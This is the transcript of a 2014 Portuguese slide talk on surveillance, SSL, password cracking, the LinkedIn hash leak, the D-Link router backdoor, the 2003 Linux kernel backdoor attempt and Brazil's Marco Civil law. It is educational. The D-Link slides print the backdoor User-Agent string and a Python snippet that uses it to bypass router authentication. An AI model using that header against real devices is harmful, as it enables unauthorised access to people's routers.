Espionagem e Software Livre

40
Espionagem e Software Livre Endagamentos e conclus˜ oes ´ AtilaCamurc¸a September 13, 2014

description

A espionagem através de softwares e internet é o assunto do momento, que estorou quando Edward Snowden vazou documentos que mostravam que o governo americano tinha acesso aos dados de vários países inclusive o Brasil. Mas será se isso é de hoje ou faz tempo que somos vigiados e só agora sabemos? E ainda, a que ponto sermos espionados nos causa algum prejuízo?

Transcript of Espionagem e Software Livre

Page 1: Espionagem e Software Livre

Espionagem e Software LivreEndagamentos e conclusoes

Atila Camurca

September 13, 2014

Page 2: Espionagem e Software Livre

Sumary

1 Introducao

2 Acesso seguro atraves da internet

3 Hackers e Crackers

Hackeando Google e Duck Duck Go

Tecnicas para quebrar senhas

Vazamento de senhas ao Linkedin

Engenharia reversa em firmware D-Link

Ataque ao Kernel

4 Marco Civil da Internet no Brasil

Page 3: Espionagem e Software Livre

Sobre Mim

Graduando em Ciencia da Computacao pelo IFCE.7 anos de experiencia com Linux.Organizador do COMSOLiD a 6 anos.

Page 4: Espionagem e Software Livre

Introducao

Figure : Nicolas Maduro e Dilma Rousseff

Page 5: Espionagem e Software Livre

SSLSecure Socket Layer

Page 6: Espionagem e Software Livre

Acesso seguro atraves da internet

Para acessar a internet com seguranca usamos o protocolo SSL juntocom o HTTP.

Figure : SSL do Gmail

Page 7: Espionagem e Software Livre

Acesso seguro atraves da internet

SSL e uma nova camada de protocolo que opera em cima do protocoloTCP.

Permite ambas as maquina, cliente e servidor, estabelecer uma conexaocriptografada.

Page 8: Espionagem e Software Livre

Acesso seguro atraves da internet

Entretanto isso e uma especificacao, ou seja, alguem tem queimplementar. Algumas empresas que o implementam:

OpenSSL (http://www.openssl.org/) - Implementacao livre egratuita do SSL.Apache-SSL (http://www.apache-ssl.org/) - um servidor webseguro, baseado no OpenSSL.SSLeay(ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/)- uma implementacao gratuita do Netscape’s Secure Socket Layer.Planet SSL (http://www.rsasecurity.com/standards/ssl/developers.html) -prove SSL para programas em C e Java.

Page 9: Espionagem e Software Livre

Acesso seguro atraves da internet

Exemplo de mesma implementacao para problemas diferentes:

multiplicacao de 2 numeros:

2 * 3

ou

2 + 2 + 2

Page 10: Espionagem e Software Livre

Software Livre e seguro?

Page 11: Espionagem e Software Livre

Software Livre e seguro?

Figure : Codigos Compilados

Page 12: Espionagem e Software Livre

Software Livre e seguro?

Figure : Codigos Interpretados

Page 13: Espionagem e Software Livre

O quao e seguro umacriptografia usando SSL?

Page 14: Espionagem e Software Livre

Levaria um temposignificativamente maior que aidade do universo para quebrar

uma chave de 128-bits.Estima-se um pouco mais de 13 bilhoes de anos.

Fonte: http://www.inet2000.com/public/encryption.htm

http://www.digicert.com/TimeTravel/math.htm

Page 15: Espionagem e Software Livre

Hackers e Crackers

Page 16: Espionagem e Software Livre

Hackers e Crackers

Crackers sao pessoas que invadem computadores com propositoscriminais ou ganho pessoal.

Enquanto Hackers podem ser especialistas em seguranca contratadospor empresas, com o objetivo de encontrar possıveis vulnerabilidades esana-las.

Page 17: Espionagem e Software Livre

Hackeando Google

Hackear e uma coisa boa! Alguns sites permitem que isso seja feito deforma a otimizar processos, como fazer uma busca. Vejamos umexemplo com o Google quando fazemos a seguinte busca:

comsolid filetype:pdf

Alem de buscar a palavra comsolid, ele busca apenas arquivos pdf.

Page 18: Espionagem e Software Livre

Hackeando Google

Ou ainda podemos fazer buscas em determinados sites somente. Bastafazer uma busca na forma:

inkscape site:comsolid.org

Essa busca pesquisa a palavra inkscape no site comsolid.org

Page 19: Espionagem e Software Livre

Hackeando Duck Duck Go

Duck Duck Go e um motor de busca preocupado com a pesquisa em sie sua privacidade.

https://duckduckgo.com/

Possui parte de seu codigo livre, isso inclui plugins, add-ons, etc. Paginado github:

https://github.com/duckduckgo/

Page 20: Espionagem e Software Livre

Hackeando Duck Duck Go

Duck Duck Go permite hacks mais engenhosos. Vamos a eles:

!g comsolid - busca comsolid no googleexpand http://va.mu/dIwg - mostra a URL originalip address - mostra seu endereco IPgithub sige - mostra repositorios do github@comsolid - mostra usuario do Twitterage of linus torvalds - diz a idadedefine free software - define uma palavra ou fraseweather in fortaleza - mostra a previsao do tempodaft punk soundcloud - busca musicas no soundcloud

Page 21: Espionagem e Software Livre

Hackeando Duck Duck Go

Temos ainda o http://duckduckhack.com/

Figure : Duck Duck Hack

Page 22: Espionagem e Software Livre

Tecnicas para quebrarsenhas

Page 23: Espionagem e Software Livre

Tecnicas para quebrar senhas

A tecnica mais conhecida e natural e a forca bruta, ou seja, tentar todasas combinacoes possıveis ate encontrar. Isso funciona ate certo ponto,quando a entrada e pequena.

Num artigo escrito por Dan Goodin no site http://arstechnica.comem que descreve como Kevin Young, um pesquisador de seguranca desenhas, procedeu para descriptografar senhas vazadas pelo Antisec deuma empresa chamada Stratfor.

Page 24: Espionagem e Software Livre

Tecnicas para quebrar senhas

Apos quebrar 60% das senhas usando listas de senhas disponıveis em:

Hashcat - http://hashcat.net/oclhashcat-plus/John the Ripper - http://www.openwall.com/john/

Para os outros 40% ele ficou “sem palavras”, entao onde encontra-las?

Que tal Wikipedia, Youtube, Bıblia, Projeto Gutenberg?

Page 25: Espionagem e Software Livre

Tecnicas para quebrar senhas

Uma das senhas era “crotalus atrox”, nome cientıfico de uma cobra. Talsenha foi quebrada gracas a esta pagina da Wikipedia:https://en.wikipedia.org/wiki/Crotalus_atrox

Em seguida outras senhas fortes por serem grandes foram encontradascomo:

“from genesis to revelations” (26)“I cant remember anything” (24)“thereisnofatebutwhatwemake” (26)“givemelibertyorgivemedeath” (26)

Page 26: Espionagem e Software Livre

Vazamento de senhas ao Linkedin

Em Junho de 2012 um usuario anonimo postou no sitehttp://insidepro.com/ uma lista com 6.5 milhoes de hashs unicosreferentes a senhas pedindo ajuda para recupera-las.

Apos quebrar muitas das senhas descobriu-se que se tratava de um bancode senhas do site Linkedin. Essa descoberta foi possıvel pelo numero desenhas com a palavra linkedin.

Page 27: Espionagem e Software Livre

Vazamento de senhas ao Linkedin

Na lista existiam:

1 - linkedin (4408)2 - link (2638)3 - linked (2135)

Outras senhas encontradas:

8 - love (1018)11 - password (856)16 - abc (750)

Mais informacoes em: http://www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf

Page 28: Espionagem e Software Livre

Engenharia reversa em firmware D-Link

Todos sabemos que a D-Link e especializada em fazer roteadores, e elessao um bom local para backdoors. E isso foi exatamente que CraigHeffner autor no blog http://www.devttys0.com encontrou.

Ele encontrou a partir de uma engenharia reversa no firmware de umados roteadores.

Page 29: Espionagem e Software Livre

Engenharia reversa em firmware D-Link

Apos notar que certa funcao chamada alpha auth check soavasuspeita, ele foi saber o que exatamente ela fazia. Apos um tempo elechegou no seguinte trecho de codigo:

int alpha_auth_check(struct http_request_t *request) {if(strstr(request->url, "graphic/") ||

strstr(request->url, "public/") ||strcmp(request->user_agent,

"xmlset_roodkcableoj28840ybtide") == 0) {return AUTH_OK;

} else {if(check_login(request->0xC, request->0xE0) != 0) {

return AUTH_OK;}

}return AUTH_FAIL;

}

Page 30: Espionagem e Software Livre

Engenharia reversa em firmware D-Link

Baseado no codigo fonte das paginas HTML e outros detalhes e sensatoconcluir que os seguintes modelos sao afetados:

DIR-100DIR-120DI-624SDI-524UPDI-604SDI-604UPDI-604+TM-G5240

Page 31: Espionagem e Software Livre

Engenharia reversa em firmware D-Link

Quem quiser fazer um teste real existe um codigo em Python escrito peloproprio Craig e pode ser encontrado em:

http://pastebin.com/vbiG42VD

# Normally only admins can access the tools_misc.xgi page;# use the backdoor user-agent to bypass authenticationimport urllib2# ...req = urllib2.Request(url+buf,

headers={’User-Agent’: ’xmlset_roodkcableoj28840ybtide’

})urllib2.urlopen(req)

Page 32: Espionagem e Software Livre

Ataque ao Kernel

Page 33: Espionagem e Software Livre

Ataque ao Kernel

http://linux.slashdot.org/story/13/10/09/1551240/the-linux-backdoor-attempt-of-2003

Em 2003, houve uma tentativa de backdoor no Kernel do Linux.

/* ... */if ((options == (__WCLONE|__WALL))

&& (current->uid = 0))retval = -EINVAL;

/* ... */

Bastava chamar a funcao wait4 e voce viraria root.

Page 34: Espionagem e Software Livre

Ataque ao Kernel

Comparemos os codigos original e o backdoor, e vejam se encontram adiferenca.

/* ... */if ((options == (__WCLONE|__WALL))

&& (current->uid == 0))retval = -EINVAL;

/* ... */

/* ... */if ((options == (__WCLONE|__WALL))

&& (current->uid = 0))retval = -EINVAL;

/* ... */

Page 35: Espionagem e Software Livre

Marco Civil da Internet no Brasil

O que e Marco Civil?

E um projeto de Lei que visa estabelecer direitos e deveres na utilizacaoda Internet no Brasil. E a constituicao da Internet no paıs.

Page 36: Espionagem e Software Livre

Quais sao os direitos e deveres?

Neutralidade: proıbe que provedores de internet discriminem certosservicos em detrimento de outros.Armazenamento de dados: Operacao de coleta de dados no Brasildeve respeitar a privacidade, protecao dos dados e sigilo dascomunicacoes privadas.Retirada de conteudo: entidades que oferecem conteudo eaplicacoes so serao responsabilizadas por danos gerados por terceirosse nao acatarem ordem judicial exigindo a retirada dessaspublicacoes.

Page 37: Espionagem e Software Livre

Quais sao os direitos e deveres?

Fim do marketing dirigido: as empresas de acesso nao poderao“espiar” o conteudo das informacoes trocadas pelos usuarios narede. Ha interesse em fazer isso com fins comerciais, como parapublicidade.Sigilo e privacidade: Provedores de acesso a internet seraoobrigados a guardar os registros das horas de acesso e do fim daconexao dos usuarios pelo prazo de seis meses, mas isso deve serfeito em ambiente controlado.

Para mais detalhes:http://www.molon1313.com.br/marco-civil-da-internet/

Page 38: Espionagem e Software Livre

Onde encontrar essa palestra?

Voce pode baixar essa palestra e ainda outras em:

http://sige.comsolid.org/u/atilacamurca

Page 39: Espionagem e Software Livre

Duvidas?

Page 40: Espionagem e Software Livre

Conecte-se

E-mail:[email protected]

Twitter:http://twitter.com/#!/atilacamurca

Blog MAD3 Linux:http://www.mad3linux.org

COMSOLiD:http://comsolid.org/

http://twitter.com/#!/comsolidhttps://www.facebook.com/comsolid

Github:https://www.github.com/atilacamurca